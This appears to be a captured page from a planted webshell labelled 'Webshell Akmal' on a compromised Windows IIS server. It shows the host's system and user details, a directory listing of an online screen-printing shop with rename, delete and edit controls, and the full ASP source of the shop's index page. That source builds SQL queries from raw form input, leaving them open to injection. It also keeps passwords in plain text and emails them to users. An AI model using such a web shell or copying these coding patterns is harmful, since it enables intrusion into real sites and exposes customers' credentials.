Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Language" content="zh-cn"> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta name="google-translate-customization" content="dd9ab110111b95e8-23f17d3073499cf4-g783cd8b386774c48-19"></meta> <!--#include file="conn.asp" --> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen" /> <title>ASC365.com screen printing, home DIY printing machine, T-shirt printing machine, silk screnning supplies, 6 color 6 station screen press, 4 color 4 station screen printing machine, single color printing, screen starter, screen printing kit, flash dryer, exposure unit, screen, mesh, fabric, screen frame, t-shirt pallet plate�� squeege, emulsion scoop coater�� color pigment, plastisol, pvc ink</title> <% Set fs=Server.CreateObject("Scripting.FileSystemObject") Session("GetType")=263 ID=Request.QueryString("ID") 'if len(ID)=0 then 'ID="FT1" 'end if Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL") %> <%'----------------------------------------------------------------------- ' ����������� dim PB(20,1) i=0 Pathh=Server.MapPath("../../CANADA/Webadmin/PublicListing") 'response.write pathh Set f=fs.OpenTextFile(pathh, 1) Do while f.AtEndOfStream = false DD=trim(f.ReadLine) if left(DD,1)="*" then Temp=split(DD,"#") if trim(temp(1))="%" then PB(i,0)="" : PB(i,1)="" else PB(i,0)=trim(temp(1)) PB(i,1)=trim(temp(2)) end if 'response.write i&" "& PB(i,0) & "<br>" i=i+1 end if loop f.Close Set f=Nothing: %> <% if request("Action")="Search" then searchname=request.Form("Search1") response.redirect(Thispage&"?ID=Search&searchname="&searchname) end if %> <% '-----����Ա���е�¼ if request("Action")="Admin_LoginCheck" then useremail1=Trim(Request.form("email1")) userpassword1=Trim(Request.Form("password1")) 'Md5_Pass=Md5(Md5(password1,16),32) '-----�����ж��û��������롢��֤���Ƿ�Ϊ�� '-----�����ж���֤�롢�û����������Ƿ���ȷ����¼��¼��� set rs=server.createobject("adodb.recordset") sql="select * from UserInfo where UserEmail='"&useremail1&"' and UserPass='"&userpassword1&"' and UserType=2" rs.open sql,conn,1,1 if not rs.eof then Response.Cookies("WebCookieUser")=rs("UserName") Response.Cookies("WebCookiePass")=rs("UserPass") Response.Cookies("WebCookieEmail")=rs("UserEmail") Response.Cookies("WebCookieType")=rs("UserType") session("UserEmail")=rs("UserEmail") Response.Redirect(Thispage) else errmsg="" Response.write"<script>alert(""Please enter the correct Email or password"");window.location.href=""index.asp?ID=Register"";</script>" Response.End end if rs.close set rs=nothing conn.close set conn=nothing end if '-----����Ա�˳���¼ if ID="LogOut" then Response.Cookies("WebCookieUser")="" Response.Cookies("WebCookiePass")="" Response.Cookies("WebCookieRealName")="" Response.Cookies("WebCookieLevel")="" session("UserEmail")="" Response.write"<script>alert(""Exit Sucess"");top.location.href=""index.asp"";</script>" end if 'ɾ������ if request("Action")="deleteorder" then orderid=request.QueryString("orderid") set rs11=server.createobject("adodb.recordset") sql11="select * from orderlist where orderid='"&orderid&"'" rs11.open sql11,conn,3,3 if not rs11.eof then rs11("orderstate")=1 rs11.update rs11.close set rs11=nothing Response.write"<script>window.location.href=""index.asp?ID=MyAsc365"";</script>" end if end if '-----����Աע�� if request("Action")="Register_email" then useremail2=Trim(Request.form("email2")) userpassword2=Trim(Request.Form("password2")) countryname=Request.Form("T6") 'Md5_Pass=Md5(Md5(password1,16),32) '-----�����ж��û��������롢��֤���Ƿ�Ϊ�� '-----�����ж���֤�롢�û����������Ƿ���ȷ����¼��¼��� set rs=server.createobject("adodb.recordset") sql33="select * from UserInfo where UserEmail='"&useremail2&"' and UserType=2" rs.open sql33,conn,1,3 if not rs.bof then Response.write"<script language=javascript>alert(""The Email Address has already been registered"");location.href='index.asp?ID=Register';</script>" Response.End() else rs.addnew rs("UserName")="" rs("UserPass")=userpassword2 rs("UserEmail")=useremail2 rs("UserType")=2 rs("UserCountry")=countryname rs("Useful")=0 rs.update rs.close set rs=nothing conn.close D_link="http://screenprinting.asc365.com/Emailactive.asp?Email="&useremail2 D_message="" D_message=D_message&"<table border='1' width='800' height='113' bordercolor='#CCCCCC' style='border-collapse: collapse'>" & chr(13) & chr(10) D_message=D_message&"<tr>" & chr(13) & chr(10) D_message=D_message&"<td height='85' width='400'><p>Dear" D_message=D_message&useremail2 D_message=D_message&",</p>" & chr(13) & chr(10) D_message=D_message&" <p>Your Password is <span style='color:#FF0000'>" D_message=D_message&"</span></p>"&chr(13)&chr(10) D_message=D_message&" <p>You can click the follow Link to active your email</p></td>"&chr(13)&chr(10) D_message=D_message&"<a href='" D_message=D_message&D_link D_message=D_message&"'>"&D_link D_message=D_message&"</a>"& chr(13) & chr(10) D_message=D_message&"<tr>" & chr(13) & chr(10) D_message=D_message&"</table>" dim objCDOMail Set objCDOMail = Server.CreateObject("CDO.Message") objCDOMail.From ="damao7000@asc365.com" '������ַ objCDOMail.To =useremail2 '���յ�ַ objCDOMail.Subject = "Message of Your Password" '�ʼ����� objCDOMail.HTMLBody = D_message '�ʼ����ݣ���Html��д�� objCDOMail.Send Set objCDOMail = Nothing useremail2="" Response.write"<script>alert('A message has been sent to your mailbox, please activate the mailbox');top.location.href='index.asp?ID=Register'</script>" response.End() end if end if %> <% if request("Action")="forgotPass" then useremail=Trim(request.Form("email_address")) set rs=server.createobject("adodb.recordset") sql="select UserEmail,UserPass from UserInfo where UserEmail='"&useremail&"'" rs.open sql,conn,1,1 if not(rs.bof and rs.eof) then D_message="" D_message=D_message&"<table border='1' width='800' height='113' bordercolor='#CCCCCC' style='border-collapse: collapse'>" & chr(13) & chr(10) D_message=D_message&"<tr>" & chr(13) & chr(10) D_message=D_message&"<td height='85' width='400'><p>Dear" D_message=D_message&rs("UserEmail") D_message=D_message&",</p>" & chr(13) & chr(10) D_message=D_message&" <p>Your Password is <span style='color:#FF0000'>" D_message=D_message&rs("UserPass") D_message=D_message&"</span></p>"&chr(13)&chr(10) D_message=D_message&" <p>You can click <a href='http://screenprinting.asc365.com'>here </a> to go to ASC365.</p></td>"&chr(13)&chr(10) D_message=D_message&"<tr>" & chr(13) & chr(10) D_message=D_message&"</table>" Set objCDOMail = Server.CreateObject("CDO.Message") objCDOMail.From ="damao7000@asc365.com" '������ַ objCDOMail.To =useremail '���յ�ַ objCDOMail.Subject = "Message of Your Password" '�ʼ����� objCDOMail.HTMLBody = D_message '�ʼ����ݣ���Html��д�� objCDOMail.Send Set objCDOMail = Nothing Response.write"<script>alert(""The Email has been send,Please check it. "");location.href=""index.asp?ID=Register"";</script>" response.End() else Response.write"<script>alert(""The Email does not exit"");location.href=""index.asp?ID=Register"";</script>" response.End() end if end if %> <% if len(ID)=0 or left("ID",2)="LL" then response.redirect(Thispage&"?ID=FT263") end if %> <style type="text/css"> <!-- .STYLE6 { font-size: 14px; font-weight: bold; } --> </style> </head> <body style="color:#000000;"> <table style="width:1000px; height:auto;margin:auto;" cellpadding="0" cellspacing="0"> <tr> <td> <table width="1000" height="124" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="121" height="22"><a href="http://www.asc365.com" target="_black"><img src="image/newbutton/webhome.jpg" /></a></td> <td width="507" style="text-align:right;"> <% if len(session("UserEmail"))>0 then %> <table width="450" border="0"> <tr valign="top"> <td width="228"><font style="font:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#000000"> <strong>Hello,<%=session("UserEmail")%></strong></font></td> <td width="79"> <a href="<%=Thispage&"?ID=LogOut"%>" class="STYLE6"><p style="font:Verdana, Arial, Helvetica, sans-serif; font-size:16px; color:#000000"><strong>Sign Out</strong></p></a> </td> <td width="159"><a href="<%=Thispage&"?ID=MyAsc365"%>"> <p style="font:Verdana, Arial, Helvetica, sans-serif; font-size:16px; color:#000000"><strong>My ASC365</strong></p> </a></td> </tr> </table> <% else %> <a href="<%=Thispage&"?ID=Register"%>" ><img src="image/newbutton/login.gif"></a> <% end if %> </div></td> <td width="142"><a href="<%="?ID=C2"%>"><img src="image/newbutton/cart.jpg" /></a></td> <td width="124"><a href="<%="?ID=P8"%>"><img src="image/newbutton/contact.gif" /></a></td> <td width="106"><div id="google_translate_element"></div><script type="text/javascript"> function googleTranslateElementInit() { new google.translate.TranslateElement({pageLanguage: 'en', includedLanguages: 'ar,de,en,es,fr,hi,it,ko,ru', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, autoDisplay: false}, 'google_translate_element'); } </script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script></td> </tr> <tr> <td colspan="7"><table width="1000" height="102" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="237" rowspan="2"><img src="image/newbutton/logo.jpg" /></td> <td><img src="image/newbutton/home1.gif" /></td> <td rowspan="2"><img src="image/newbutton/home2.jpg" /></td> </tr> <tr> <td style="text-align:right"> <div style="text-align:left; width:300px; height:30px; background-image:url(image/newbutton/search.gif); background-repeat:no-repeat; margin-left:120px"> <form method="post" action="?Action=Search"> <div style="float:left"> <input style="margin-left:3px; margin-top:0px; height:24px; width:220px; font-size:16px" name="Search1" type="text" /> </div> <div style="float:left; width:64px; height:30px ; border:0"> <input name="submit" type="submit" style="background-image:url(image/newbutton/search1.gif); border:0; background-position:left; background-repeat:repeat; width:64px; height:30px" value="" /> </div> </form> </div> </td> </tr> </table></td> </tr> </table> </td> </tr> <tr style="margin:0 auto; padding:0;" > <td > <div style="border:0; margin-top:0 auto; padding:0; background-image:url(image/2.jpg)"> <div style="float:left"> <div id="daohang2" style="height:35px; text-align:left; width:1000px;background-image:url(image/bg4.jpg); background-repeat:repeat-x" > <% Server.Execute("daohang1.asp") %> </div> </div> </div> </td> </tr> <tr> <td> <div id="contentdiv" style="width:1000px; z-index:-10; margin-top:1px"> <div style="float:left; width:196px;"> <div> <% if left(ID,8)="MyAsc365" then Server.Execute("myasc365.asp") else Server.Execute("daohang2.asp") end if %> </div> <div> <% server.Execute("daohang4.asp") %> </div> </div> <div style="width:800px; float:left;"> <div style="width:800px;"> <% if left(ID,2)="FT" then %> <div style=" width:770px"> <% Server.Execute("texiao2.htm") %> </div> <% end if %> <!--��Ʒչʾ --> <div style="width:800px; height:auto; text-align:left;" > <% if left(ID,2)="FT" then Server.Execute("screenprinting.htm") elseif left(ID,2)="ST" then Server.Execute("Productlist1.asp") elseif left(ID,2)="TT" then Server.Execute("Productlist2.asp") elseif left(ID,2)="DT" then Server.Execute("Productlist3.asp") elseif left(ID,2)="PD" then Server.Execute("ProductDetail.asp") elseif ID="C2" then Server.Execute("C2_MyShippingCart.asp") end if %> <% if ID="MyAsc365" then server.Execute("myorders.asp") elseif ID="MyAsc365address" then server.Execute("myaddress.asp") elseif ID="MyAsc365Cart" then server.Execute("C2_MyShippingCart.asp") end if %> <% if ID="Payment" then server.Execute("payment.asp") end if %> <% IF ID="P0" then Server.Execute("../../CANADA/Webadmin/Public/00/"&PB(0,1)) ELSEIF ID="P1" then Server.Execute("../../CANADA/Webadmin/Public/01/"&PB(1,1)) ELSEIF ID="P2" then Server.Execute("../../CANADA/Webadmin/Public/02/"&PB(2,1)) ELSEIF ID="P3" then Server.Execute("../../CANADA/Webadmin/Public/03/"&PB(3,1)) ELSEIF ID="P4" then Server.Execute("../../CANADA/Webadmin/Public/04/"&PB(4,1)) ELSEIF ID="P5" then Server.Execute("../../CANADA/Webadmin/Public/05/"&PB(5,1)) 'ELSEIF ID="P6" then 'Server.Execute("../Webadmin/Public/06/"&PB(6,1)) ELSEIF ID="P7" then Server.Execute("../../CANADA/Webadmin/Public/07/"&PB(7,1)) ELSEIF ID="P8" then Server.Execute("../../CANADA/Webadmin/Public/08/"&PB(8,1)) ELSEIF ID="P9" then Server.Execute("../../CANADA/Webadmin/Public/09/"&PB(9,1)) ELSEIF ID="P10" then Server.Execute("../../CANADA/Webadmin/Public/10/"&PB(10,1)) ELSEIF ID="P11" then Server.Execute("aboutus.htm") ELSEIF ID="P12" then Server.Execute("../../CANADA/Webadmin/Public/12/"&PB(12,1)) ELSEIF ID="P13" then Server.Execute("../../CANADA/Webadmin/Public/13/"&PB(13,1)) ELSEIF ID="P14" then Server.Execute("../../CANADA/Webadmin/Public/14/"&PB(14,1)) ELSEIF ID="P15" then Server.Execute("../../CANADA/Webadmin/Public/15/"&PB(15,1)) ELSEIF ID="P16" then Server.Execute("../../CANADA/Webadmin/Public/16/"&PB(16,1)) ELSEIF ID="P17" then Server.Execute("../../CANADA/Webadmin/Public/17/"&PB(17,1)) ELSEIF ID="P18" then Server.Execute("../../CANADA/Webadmin/Public/18/"&PB(18,1)) ELSEIF ID="P19" then Server.Execute("../../CANADA/Webadmin/Public/19/"&PB(19,1)) ELSEIF ID="P20" then Server.Execute("../../CANADA/Webadmin/Public/20/"&PB(20,1)) END IF %> <% if ID="Search" and len(Request.QueryString("searchname"))>0 then response.Cookies("search")=request.QueryString("searchname") server.Execute("SearchProduct.asp") end if %> <% if ID="Register" then server.Execute("Register.asp") end if %> <% if ID="forgotpass" then server.Execute("forgotpass.asp") end if %> </div> </div> </div> </div> </td> </tr> <tr> <td> <div id="bottomdiv" style=" width:1000px; text-align:center"> <table width="1000" border="0"> <tr> <td> <table border="0" width="1000" height="22" background="image/Pbar.png"> <form method="POST" action=""> <tr> <td height="22" width="700" ><font face="Verdana " style="font-size: 9pt">If you want special offers, exclusives and promotions.Please input your Email address.</font></td> <td height="22" width="200" align="center"><input type="text" name="T_email" size="25" value="<%=Id_Email%>"></td> <td height="22" width="90" align="center"><input type="submit" value="Subscribe" name="BM_email"></td> </tr> </form> </table></td> </tr> <tr> <td> <table border="0" width="1000" height="24"> <tr valign="middle"> <td width="80"></td> <% for ii= 11 to 20 %> <td height="22" width="80"><font face="Verdana " style="font-size: 8pt"><a href="<%=Thispage&"?ID=P"&ii%>"> <%=PB(ii,0)%></a></font> </td> <% next %> </tr> </table> </td> </tr> <tr> <td> <table border="0" width="1000" height="24"> <tr> <td height="25" width="1000" bgcolor="#C3DAF9"> <p align="center"><span style="float: center"> <font size="1" face="Verdana" color="#800000">Copyright ASC365.com All Rights Reserved</font></span></p> </td> </tr> </table> </td> </tr> </table> </div> </td> </tr> </table> <script type="text/javascript" src="http://skype.tom.com/script/skypeCheck40.js"></script> <div id="FloatDIV" style="position: absolute; text-align:left; width:140px; height:90px; background-image:url(image/service.jpg); background-repeat:no-repeat;top: 0px; border-right: activeborder 1px solid; border-top: activeborder 1px solid; border-left: activeborder 1px solid; border-bottom: activeborder 1px solid; z-index:9999"> <ul> <li style="margin-top:25px; margin-left:5px"><img style="border-style: none;" src="http://messenger.services.live.com/users/a4564902598fcc15@apps.messenger.live.com/presenceimage?mkt=en-US" width="16" height="16" /><a href="msnim:chat?contact=asc365_sales@hotmail.com" class="STYLE2">Chat with MSN</a></li> <li style="margin-top:10px;margin-left:5px"><a href="skype:asc365sales?chat" onclick="return skypeCheck();"><img src="http://mystatus.skype.com/smallicon/asc365sales" style="border: none;" width="16" height="16" alt="My status" /></a><a href="skype:asc365sales?chat" class="STYLE2" onclick="return skypeCheck();">Chat with Skype </a> </li> </ul> </div> <script type="text/javascript"> var MarginLeft = 12; //��������������Ҳ�ľ��� var MarginTop = 190; //������������������ľ��� var Width = 140; //�������� var Heigth= 90; //������߶� //���ø��������� function Set() { document.getElementById("FloatDIV").style.width = Width + 'px'; document.getElementById("FloatDIV").style.height = Heigth + 'px'; } //ʵʱ���ø������λ�� function Move() { var b_top = window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop || 0; var b_width= document.body.clientWidth; document.getElementById("FloatDIV").style.top = b_top + MarginTop + 'px'; document.getElementById("FloatDIV").style.left = b_width - Width - MarginLeft + 'px'; setTimeout("Move();",100); } Set(); Move(); </script> </body> </html>